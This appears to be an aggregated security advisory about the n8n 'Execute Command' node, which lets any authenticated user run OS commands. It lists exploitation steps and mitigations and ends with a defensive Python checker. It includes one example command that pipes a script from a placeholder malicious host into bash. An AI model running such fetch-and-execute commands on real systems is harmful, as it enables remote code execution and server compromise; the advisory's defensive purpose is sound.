The CVE-2021-21292 vulnerability stems from the inherent functionality of the ‘Execute Command’ node within the n8n workflow automation platform. This node is designed to execute arbitrary operating system commands on the underlying host, a powerful feature for advanced automation tasks. The security issue is not a code flaw in the traditional sense but a dangerous default configuration: the node is available to all authenticated users. In a deployment where not all users are fully trusted, a malicious actor with a standard user account can use this node to run any system command. Doing so does not require bypassing any security controls within n8n itself, because the node is explicitly designed for this purpose. An attacker can craft a workflow that uses this node to execute commands for malicious purposes, such as spawning a reverse shell, exfiltrating sensitive files from the host, or installing malware, leading to a full compromise of the server n8n is running on.
Platform: n8n
Version: All versions
Vulnerability: Code Injection
Severity: Critical
Date: 2021-01-21
Prediction: Patch: 2021-02-15
What Undercode Says:
# Check if n8n process is running
ps aux | grep n8n
# Example of a dangerous command that could be executed via the node
curl http://malicious-site.com/exploit.sh | bash
# List running processes after potential exploit
ps -ef
How to Exploit:
Attacker authenticates to n8n.
Creates or edits a workflow.
Adds the ‘Execute Command’ node.
Inserts malicious OS commands.
Executes the workflow.
Protection from this CVE
Set the NODES_EXCLUDE environment variable.
Disable the node.
Restrict user access.
Use n8n.cloud.
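As an added defender-side example (not code from the post or from the n8n project), the following Python check verifies that NODES_EXCLUDE actually excludes the Execute Command node and lists any Execute Command nodes already present in an exported workflow. It assumes n8n's documented format for NODES_EXCLUDE (a JSON array of node type names), the node type identifier `n8n-nodes-base.executeCommand`, and the usual exported workflow shape (a `nodes` array with `type`, `name` and `parameters`); the environment values and workflow are constructed samples.

```python
import json
from typing import Any, Optional

# Node type identifier of the n8n 'Execute Command' node, as used both in
# NODES_EXCLUDE and in exported workflow JSON.
EXECUTE_COMMAND_TYPE = "n8n-nodes-base.executeCommand"


def nodes_exclude_covers(env_value: Optional[str]) -> bool:
    """Return True only if NODES_EXCLUDE is a JSON array naming the node.

    An unset, empty or malformed value is treated as 'not excluded', which
    is the dangerous default the post describes.
    """
    if not env_value:
        return False
    try:
        excluded = json.loads(env_value)
    except json.JSONDecodeError:
        return False
    return isinstance(excluded, list) and EXECUTE_COMMAND_TYPE in excluded


def find_execute_command_nodes(workflow: dict[str, Any]) -> list[tuple[str, str]]:
    """List (node name, configured command) for every Execute Command node
    in an exported workflow, so existing workflows can be reviewed."""
    hits = []
    for node in workflow.get("nodes", []):
        if node.get("type") == EXECUTE_COMMAND_TYPE:
            params = node.get("parameters", {})
            hits.append((node.get("name", "?"), params.get("command", "")))
    return hits


# Constructed sample values (not taken from a real deployment).
WEAK_ENV = None  # variable unset: node available to every authenticated user
HARDENED_ENV = '["n8n-nodes-base.executeCommand","n8n-nodes-base.writeBinaryFile"]'
SAMPLE_WORKFLOW = {
    "name": "nightly report",
    "nodes": [
        {"name": "Cron", "type": "n8n-nodes-base.cron", "parameters": {}},
        {"name": "Run script", "type": EXECUTE_COMMAND_TYPE,
         "parameters": {"command": "sh /opt/reports/build.sh"}},
    ],
}

if __name__ == "__main__":
    print("weak env excludes node:", nodes_exclude_covers(WEAK_ENV))          # False
    print("hardened env excludes node:", nodes_exclude_covers(HARDENED_ENV))  # True
    print("Execute Command nodes found:", find_execute_command_nodes(SAMPLE_WORKFLOW))
```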
Impact:
Full system compromise.
Data exfiltration.
Service disruption.
Sources:
Reported By: github.com